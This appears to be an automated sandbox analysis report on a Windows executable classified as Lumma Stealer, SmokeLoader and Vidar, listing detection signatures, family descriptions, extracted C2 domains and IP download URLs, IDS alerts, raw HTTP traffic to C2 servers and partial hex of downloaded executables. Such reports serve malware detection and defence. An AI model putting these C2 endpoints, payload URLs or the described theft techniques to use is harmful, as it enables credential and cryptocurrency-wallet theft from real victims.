Windows Analysis Report
c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe

Overview

General Information

Sample name: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe
Analysis ID: 1447731
MD5: a93525f5f13c811e90c56492f5ac934a
SHA1: 37fb7a8b8903f4b614cec214f0ff0c69c88a1864
SHA256: 1b69a9c37210a79131c5cbcfaa4163fb5027989b4537b43a5a6cf6f40a4bab1a
Tags: exe

Detection

LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected CryptOne packer
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected SmokeLoader
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Found many strings related to Crypto-Wallets (likely being stolen)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Opens network shares
PE file has a writeable .text section
Query firmware table information (likely to detect VMs)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file does not import any functions
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name: SmokeLoader
Description: The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual download returns an HTTP 404 but still contains data in the response body.
Attribution: SMOKY SPIDER
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA software and Tor Browser.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Avira: detected
Source: https://whispedwoodmoodsksl.shop/api Avira URL Cloud: Label: malware
Source: whispedwoodmoodsksl.shop Avira URL Cloud: Label: malware
Source: http://185.235.137.54/file/host_so.exe Avira URL Cloud: Label: malware
Source: https://whispedwoodmoodsksl.shop/apie Avira URL Cloud: Label: malware
Source: miniaturefinerninewjs.shop Avira URL Cloud: Label: malware
Source: https://whispedwoodmoodsksl.shop/X Avira URL Cloud: Label: malware
Source: http://45.129.96.86/file/update.exe Avira URL Cloud: Label: malware
Source: https://whispedwoodmoodsksl.shop/ Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Avira: detection malicious, Label: TR/AVI.AceCrypter.javlp
Source: C:\Users\user\AppData\Roaming\aarhevh Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: 00000004.00000002.2290056275.00000000001E0000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://dbfhns.in/tmp/index.php", "http://guteyr.cc/tmp/index.php", "http://greendag.ru/tmp/index.php", "http://lobulraualov.in.net/tmp/index.php"]}
Source: 0000000C.00000002.2641621333.00000000044D0000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199689717899"], "Botnet": "42d0618304a88d6476bc55d33c23d7e6", "Version": "9.8"}
Source: 21AE.exe.5640.5.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop", "boredimperissvieos.shop", "boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop", "boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop"], "Build id": "swg5EG--"}
Source: whispedwoodmoodsksl.shop Virustotal: Detection: 17%
Source: dbfhns.in Virustotal: Detection: 5%
Source: https://65.109.242.59/ Virustotal: Detection: 7%
Source: http://guteyr.cc/tmp/index.php Virustotal: Detection: 15%
Source: https://whispedwoodmoodsksl.shop/api Virustotal: Detection: 17%
Source: whispedwoodmoodsksl.shop Virustotal: Detection: 17%
Source: http://185.235.137.54/file/host_so.exe Virustotal: Detection: 19%
Source: https://whispedwoodmoodsksl.shop/apie Virustotal: Detection: 14%
Source: https://65.109.242.59/l Virustotal: Detection: 5%
Source: miniaturefinerninewjs.shop Virustotal: Detection: 19%
Source: obsceneclassyjuwks.shop Virustotal: Detection: 18%
Source: http://45.129.96.86/file/update.exe Virustotal: Detection: 20%
Source: https://65.109.242.59/r Virustotal: Detection: 6%
Source: C:\Users\user\AppData\Local\Temp\21AE.exe ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Roaming\aarhevh ReversingLabs: Detection: 55%
Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe ReversingLabs: Detection: 55%
Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Virustotal: Detection: 59%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\aarhevh Joe Sandbox ML: detected
Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_0041537E CryptUnprotectData, 5_2_0041537E

Compliance

Source: C:\Users\user\AppData\Local\Temp\21AE.exe Unpacked PE file: 5.2.21AE.exe.400000.0.unpack
Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49722 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49727 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49728 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.5:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 65.109.242.59:443 -> 192.168.2.5:49748 version: TLS 1.2
Source: Binary string: freebl3.pdb source: katA304.tmp, 0000000D.00000003.2858305689.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.13.dr, freebl3[1].dll.13.dr
Source: Binary string: mozglue.pdbP source: katA304.tmp, 0000000D.00000002.3150422505.000000006CFBD000.00000002.00000001.01000000.0000000D.sdmp, mozglue.dll.13.dr, mozglue[1].dll.13.dr
Source: Binary string: freebl3.pdbp source: katA304.tmp, 0000000D.00000003.2858305689.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.13.dr, freebl3[1].dll.13.dr
Source: Binary string: nss3.pdb@ source: katA304.tmp, 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp, nss3[1].dll.13.dr, nss3.dll.13.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.13.dr, softokn3.dll.13.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.13.dr, vcruntime140[1].dll.13.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.13.dr, msvcp140[1].dll.13.dr
Source: Binary string: nss3.pdb source: katA304.tmp, 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp, nss3[1].dll.13.dr, nss3.dll.13.dr
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.13.dr
Source: Binary string: mozglue.pdb source: katA304.tmp, 0000000D.00000002.3150422505.000000006CFBD000.00000002.00000001.01000000.0000000D.sdmp, mozglue.dll.13.dr, mozglue[1].dll.13.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.13.dr, softokn3.dll.13.dr
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Networking

Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49711 -> 187.143.58.5:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49712 -> 187.143.58.5:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49713 -> 187.143.58.5:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49714 -> 187.143.58.5:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49715 -> 187.143.58.5:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49716 -> 187.143.58.5:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49718 -> 187.143.58.5:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49719 -> 187.143.58.5:80
Source: Traffic Snort IDS: 2052787 ET TROJAN DNS Query to Lumma Stealer Domain (whispedwoodmoodsksl .shop) 192.168.2.5:58021 -> 1.1.1.1:53
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49721 -> 187.143.58.5:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49723 -> 187.143.58.5:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49737 -> 187.143.58.5:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49739 -> 187.143.58.5:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49744 -> 187.143.58.5:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49773 -> 186.112.12.192:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49774 -> 186.112.12.192:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49775 -> 186.112.12.192:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49776 -> 186.112.12.192:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49777 -> 186.112.12.192:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49778 -> 186.112.12.192:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49779 -> 186.112.12.192:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49780 -> 186.112.12.192:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49781 -> 186.112.12.192:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49782 -> 186.112.12.192:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49783 -> 186.112.12.192:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49784 -> 186.112.12.192:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49785 -> 186.112.12.192:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49786 -> 186.112.12.192:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49787 -> 186.112.12.192:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49788 -> 186.112.12.192:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49789 -> 186.112.12.192:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49790 -> 186.112.12.192:80
Source: C:\Windows\explorer.exe Network Connect: 187.143.58.5 80
Source: C:\Windows\explorer.exe Network Connect: 91.202.233.231 80
Source: C:\Windows\explorer.exe Network Connect: 23.145.40.124 80
Source: C:\Windows\explorer.exe Network Connect: 186.112.12.192 80
Source: C:\Windows\explorer.exe Network Connect: 45.129.96.86 80
Source: Malware configuration extractor URLs: boredimperissvieos.shop
Source: Malware configuration extractor URLs: holicisticscrarws.shop
Source: Malware configuration extractor URLs: sweetsquarediaslw.shop
Source: Malware configuration extractor URLs: plaintediousidowsko.shop
Source: Malware configuration extractor URLs: miniaturefinerninewjs.shop
Source: Malware configuration extractor URLs: zippyfinickysofwps.shop
Source: Malware configuration extractor URLs: obsceneclassyjuwks.shop
Source: Malware configuration extractor URLs: acceptabledcooeprs.shop
Source: Malware configuration extractor URLs: whispedwoodmoodsksl.shop
Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199689717899
Source: Malware configuration extractor URLs: http://dbfhns.in/tmp/index.php
Source: Malware configuration extractor URLs: http://guteyr.cc/tmp/index.php
Source: Malware configuration extractor URLs: http://greendag.ru/tmp/index.php
Source: Malware configuration extractor URLs: http://lobulraualov.in.net/tmp/index.php
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Sun, 26 May 2024 22:27:21 GMTContent-Type: application/octet-streamContent-Length: 325120Last-Modified: Sun, 26 May 2024 22:20:02 GMTConnection: keep-aliveETag: "6653b592-4f600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 5b 37 b0 84 3a 59 e3 84 3a 59 e3 84 3a 59 e3 89 68 86 e3 98 3a 59 e3 89 68 b9 e3 09 3a 59 e3 89 68 b8 e3 aa 3a 59 e3 8d 42 ca e3 8d 3a 59 e3 84 3a 58 e3 e7 3a 59 e3 31 a4 bc e3 85 3a 59 e3 89 68 82 e3 85 3a 59 e3 31 a4 87 e3 85 3a 59 e3 52 69 63 68 84 3a 59 e3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0e 81 f9 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 0c 01 00 00 74 08 00 00 00 00 00 86 3d 00 00 00 10 00 00 00 20 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 09 00 00 04 00 00 70 bc 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 83 01 00 64 00 00 00 00 e0 08 00 08 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 84 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 78 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 33 0b 01 00 00 10 00 00 00 0c 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 02 6c 00 00 00 20 01 00 00 6e 00 00 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 
2e 64 61 74 61 00 00 00 08 46 07 00 00 90 01 00 00 ce 02 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 08 a8 00 00 00 e0 08 00 00 aa 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 26 May 2024 22:27:52 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sun, 26 May 2024 22:23:46 GMTETag: "20ba00-61962daa50080"Accept-Ranges: bytesContent-Length: 2144768Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 66 09 00 00 50 17 00 00 00 00 00 60 75 09 00 00 10 00 00 00 80 09 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 21 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 09 00 3c 22 00 00 00 f0 0a 00 00 30 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0a 00 88 c9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 0a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 c8 65 09 00 00 10 00 00 00 66 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 
4c 2e 00 00 00 80 09 00 00 30 00 00 00 6a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 d5 10 00 00 00 b0 09 00 00 00 00 00 00 9a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 3c 22 00 00 00 d0 09 00 00 24 00 00 00 9a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 00 0a 00 00 00 00 00 00 be 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 10 0a 00 00 02 00 00 00 be 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 88 c9 00 00 00 20 0a 00 00 ca 00 00 00 c0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 30 16 00 00 f0 0a 00 00 30 16 00 00 8a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 20 21 00 00 00 00 00 00 ba 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: Joe Sandbox View IP Address: 23.145.40.124
Source: Joe Sandbox View IP Address: 188.114.97.3
Source: Joe Sandbox View ASN Name: SURFAIRWIRELESS-IN-01US
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: AKAMAI-ASUS
Source: Joe Sandbox View ASN Name: UninetSAdeCVMX
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: whispedwoodmoodsksl.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 74Host: whispedwoodmoodsksl.shop
